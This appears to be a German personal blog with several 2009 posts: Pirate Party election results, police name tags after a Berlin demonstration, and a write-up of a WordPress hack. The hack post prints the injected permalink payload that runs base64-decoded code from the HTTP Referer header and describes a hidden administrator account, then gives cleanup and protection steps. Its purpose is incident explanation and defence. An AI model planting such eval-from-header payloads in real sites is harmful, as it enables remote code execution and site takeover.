Für die Piraten gab’s 1,9% (2-3 wären schöner gewesen aber die Briefwähler sind ja noch nicht ausgewertet). Das machte sie immerhin zur stärksten “sonstigen” Partei. Gefolgt von der drecks NPD mit 1,5%… geht sterben.

Realtisch betrachtet waren 5% nie drinn. Jetzt ist’s vorbei und man kann das auch offen zugeben.

Aber für das erste mal und dafür, dass man die Piraten nur in 15 Bundesländern wählen konnten ist das Ergebnis saustark.
Jetzt hat man 4 Jahre zu reifen und auch in den anderen politischen Bereichen Konzepte zu entwickeln. Wenn man den Kurs hällt sind die 5% vieleicht schon 2013 machbar, spätestens aber in 8 Jahren.
Natürlich nur wennn man eben konsequent weitermacht. Andernfalls war’s halt nur ne Seifenblase mit der wir alle mal kurz Spass hatten.

Vieleicht müssen wir Zensursula irgendwannn ja sogar mal danken. Denn ohne Sie hätten die Piraten diesen Aufschwung nie geschafft. So ein Sprungbrett kriegt man nicht jederzeit (und ohne so einen Urknall halte ich es unmöglich sich als neue Partei zu etablieren).

Zumindest die Themen der Piraten sind bei den anderen Parteien angekommen. Bis auf die CDU haben alle erkannt das diese Themen wichtig sind und massiv Stimmen kosten können. Diesmal fast 2%, nächtes mal vieleicht mehr. Und allein dadurch haben die Stimmen der für die Piraten mehr erreicht als das ganze Pack von nichtwählern.

Die versteh ich nach wie vor nicht… es wir sich GAR NICHTS ändern wenn man nicht wählen geht. Als Zeichen interessiert das die Parteien einen scheissdreck. Da freuen sich dann nur solche Vollidioten wie die NPD, die ihre Fascho Spacken immer mobilisiert bekommen.

Es sind so viele Stimmen die nicht abgegeben wurden… die hätten über den kompletten Ausgang entscheiden können. Aber redet euch mal nur weiter ein damit ein Umdenken zu erzwingen.
Spätestens wenn die Wahlbeteiligung unter 50% gefallen ist werdet ihr merken, dass da ausser Betroffenheit im Wahltag nichts zurückkommt. Es werden immer noch die selben Parteien da sein+braunes Gesocks. Aber ändern wird sich sonst gar nichts.

Mein Vorsatz für die nächsten 4 Jahre: Jeder Nichtwähler der in meiner Gegenwart über die deutsche Politik moppert bekommt ohne Vorwarnung eine Gescheuert. Für jedes “ja aber…” gibt’s gleich eine hinterher.

Den Vorfall auf der Demo “Freiheit statt Angst” wo einigen Polizeibeamten ordentluich die Sicherungen durchgebrannt sind hat vermutlich jeder mitbekommen. Falls nicht: hier lesen und mal ein bischen weniger WoW zocken.

Nun wurden Namensschilder bzw Nummernschilder für die berliner Polizisten angekündigt.
Ansich ne gute Sache. Mal davon ab, dass es schon hieß die Dinger sollen mit Klettverschluff haften (bzw schnell abgenommen werden…)

Der eigentliche Witz steht bei heise:

Der Berliner Polizeipräsident kündigte an, dass die Polizisten künftig im täglichen Dienst und bei Demonstrationen Namensschilder tragen. Dabei gehe es nicht darum, dass Übergriffe besser geahndet werden sollten, sondern um mehr Bürgernähe. Die Beteiligten der Vorfälle vor einer Woche seien auch ohne Namens- oder Nummernschild identifiziert worden.

Aber der letzte Satz… “Die Beteiligten der Vorfälle vor einer Woche seien auch ohne Namens- oder Nummernschild identifiziert worden”… ähh…. ja, weil die Geisichter der Prügelbullen von Kameras aufgenommen wurden.
Wäre das nicht zufällig ne Demo gewesen auf der sich u.A. sehr viele Nerds, die immer mit dem neusten High Tech Spielzueg ausgestattet sind, beteiligten wäre dem nicht so gewesen. Es ist icht immer jemand mit einer Kamera dabei. Es ist ja nicht mal zu sagen ob das die einzige Aktion dieser Art auf dieser Demo war.

Aber is schon recht. Wir brauchen keine sichtbaren Namen oder Nummern zur identifzierung. Es geht nur um die Bürgnerähe.
Und alle so “yeah”.

Benutze Kopf mit Wand…

(hat irgendwer vor Tagen mal getwittert, sry weiss nicht mehr wer)

FAIL!

Und ja, so was gibt es.
So nen ähnlichen Fall kenne ich selbst. Da wurde sich dann gegen Ende des Monats ein Online Rollenspiel gekauft (also mit monatlichen Gebühren zuzüglich dem eigentlichen Spielpreis). Anfang nächsten Monats war der Strom weg. Rechnung wegen Geldknappheit nicht bezahlt…
Zumindest hat derjenige es inzwischen aus der Kriese geschafft. (Gruß, falls du hier ab und an noch rein schaust).

Ob das Exemplar da oben es auch geschafft hat? Keine Ahnung, ich schau die Sendung nicht. Aber Zwegat gilt ja als god of finance oder so.*g*

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Kann man sich denken, dass das nicht gut ist.

Anstatt also Battlestar Galactica zu schauen durfte ich hier sauber machen.
Aber nach einem Blick ins wordpress Support Forum stellte ich fest, dass ich nicht der einzige war.

Im folgenden die Details.

Was macht der Hack?
Durch eine Sicherheitslücke werden die Permalinks von Wordpress verändert. Durch diesen zusätzlichen Code können die Postings nicht mehr regulär abegrufen werden. Allerdings kann schädlicher Code eingefügt werden. Kann nicht nur, sondern wird weil das ganze automatisch abläuft. Nach dem Angriff wird ein neuer Benutzer in der Wordpress Administrator Gruppe erstellt. Dieser ist im Dashboard unsichtbar.
So weit war es bei mir. Bei anderen wurden auch Dateien hochgeladen und Wordpress Dateien verändert.
Da es anschliessend einen Administrator Nutzer gibt kann der natüürlich alles machen.

Wie genau funktioniert’s`?
2 Bedingungen müssen erfüllt sein: Eine Wordpress Version kleiner als 2.8.4 (die aktuellste) und Usern muss erlaubt sein sich zu registrieren. Allerdings bin ich bei letzterem nicht ganz sicher. Gut möglich, dass man auch das umgehen kann.
Zunächst werden ein paar Benutzer registriert. Simple Spam Registrationen.
Durch eine sehr üble Wordpress Sicherheitslücke ist es dem registrierten User möglich die Permalinks zu ändern und den oben genannten Code anzuhängen. Ich habe es selbst ausprobiert; da war nicht viel zu nötig. Schlimmer noch: Durch diese Sicherheitslücke können auch andere Wordpress Seiten aufgerufen und manipuliert werden die eigentlich nur dem admin vorbehalten sind. (und ich werde an dieser Stelle nen Teufel tun und sagen wie die funktioniert)
Ziwschen registrierung und verändern des Permalinks können Tage vergehen. Nachdem die Permalinks geändert wurden wird einer dieser Links aufgerufen (bei mir lagen 4 Stunden dazwischen).
Dazu wird ein gefälschter Referer übergeben. Wenn man sich den Code oben ansieht stellt man fest, dass dort der Referer encodiert und OHNE WENN UND ABER AUSGFÜHRT WIRD!!!

Den genauen Code der dort übergeben wird behalte ich erst einmal für mich. Kann man sonst zu leicht gegen aktuell infizierte verwenden.

Es werden Userdaten übergeben und zusätzlich wird noch der Inhalt einer Datei von einem chinesichen Server nachgeladen.
In dieser Text Datei steht der Code mit dem der neue Superuser angelegt wird.

Dieser hat anstelle eines Namens ebenfallls Code. Dieser ist diesmal etwas HTML und Javascript. Javascript ist nicht ganz mein Ding. Ich glaube, dass durch diesen Code verhindert wird, dass man den neuen User im Dashboard sehen kann. Da der Name dort angezeigt wird wird eben dort der Code ausgeführt.

Zudem wird die registrierung weiterer User deaktiviert. Vermutlich dammit man sich nicht über den selben Weg die Kontrolle über den Blog zurückholen kann wenn er erst einmal vollständig übernommen wurde.

Nun haben wir einen User Namens OrvalGunning70 und der ist Blog Administrator.
You have been hacked.
Und das vollautomatisch.

Cross Site Scriping aus dem Lehrbuch.

Woran erkennne ich ob ich betroffen bin?
1. An euren Permalinks hängt nun so was:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

2. Ihr habt registrierte Nutzer Namens
Andrianq (e-mail vergessen zu notieren)
Miriam (obierebelominepyb@gmail.com)
MikeWink (bugbeemershonyhe@gmail.com )
OrvalGunning70 (keine e-mail) (nur in der Datenbank zu finden)

Einer dieser Nutzer reicht schon damit die Alarmsirenen angehen sollten.

Was kann ich tun wennn ich betroffen bin?
Da es noch keine 100%ige Information gibt was genau alles mit dem Superuser angestellt wird kann ich keine 100%ige Anleitung geben.

1. Schaut nach ob Wordpress Dateien (vor allem die index.php) kürzlich verändert wurden. Gängige FTP Programme wie z.B. Filezilla zeigen das Änderungsdatum an.
2. Schaut nach ob neue Dateien erstellt wurden. Vor allem im Order wp-content/uploads

Wie mit 1+2 genaue Verfahren werden muss kann ich noch nicht sagen. Bei mir trat das nicht auf.

3. Löscht den User OrvalGunning70

Da man OrvalGunning70 nicht im Dashboard sehen kann kann man dies entweder über die Datenbannk machen indem man in der tabelle wp_users schaut welche ID der Nutzer hat und folgendes ausführen (XXX durch die ID von OrvalGunning70 ersetzen):

delete from wp_users where ID=XXX;
delete from wp_usermeta where user_id=XXX;

oder aber über einen Umweg:
Da die Registrierung deaktiviert wird sollte OrvalGunning70 der letzte registrierte Benutzer sein.
Geht im Wordpress Dahsboard zur Benutzerübersicht und sucht den zuletzt registrierten Benutzer (was irgendjemand anders zu sein scheint).
Rechtsklickt auf den Link um den User zu löschen und kopiert den Link.
Fügt diesen Link nun in eure URL zeile im Browserr ein.
In der URL steht nun unter anderem so etwas:

action=delete&user=7

Die 7 (oder welche Zahl auch immer da steht) ist die benutzer ID. Diese muss um eines ehöht werden. In meinem Beispiel wäre das dann eine 8.
Anschliessend die URL aufrufen (also einfach Enter drücken)

4. Löscht folgende User, falls vorhanden:
Andrianq (e-mail vergessen zu notieren)
Miriam (obierebelominepyb@gmail.com)
MikeWink (bugbeemershonyhe@gmail.com )

Löscht am besten alle User die nicht echt zu sein scheinen.

5. Ändert eure Permalinks wieder auf was gescheites.
6. Deaktiviert die User registrierung wenn ihr sie nicht braucht. (falls ihr nicht wisst ob ihr sie braucht dann braucht ihr sie nicht)
7. Schleunigst auf Wordpress 2.8.4 updaten. Das ist die einzige Version die derzeit als sicher gilt.
8. Es ist nie verkehrt zur Sicherheit mal sämtliche Passwörter zu ändern.

Wie kann ich mich schützen?
1. Deaktiviere User registrierungen in deinem Blog.
2. Update auf Wordpress 2.8.4; jede Version darunter ist anfällig.

Na, hat die junge Union sich nen Kreativen eingekauft?

Ob man darauf hinwesien sollte, dass bei der Hintergrundmusik gegen Urheberrechte verstoßen wurden?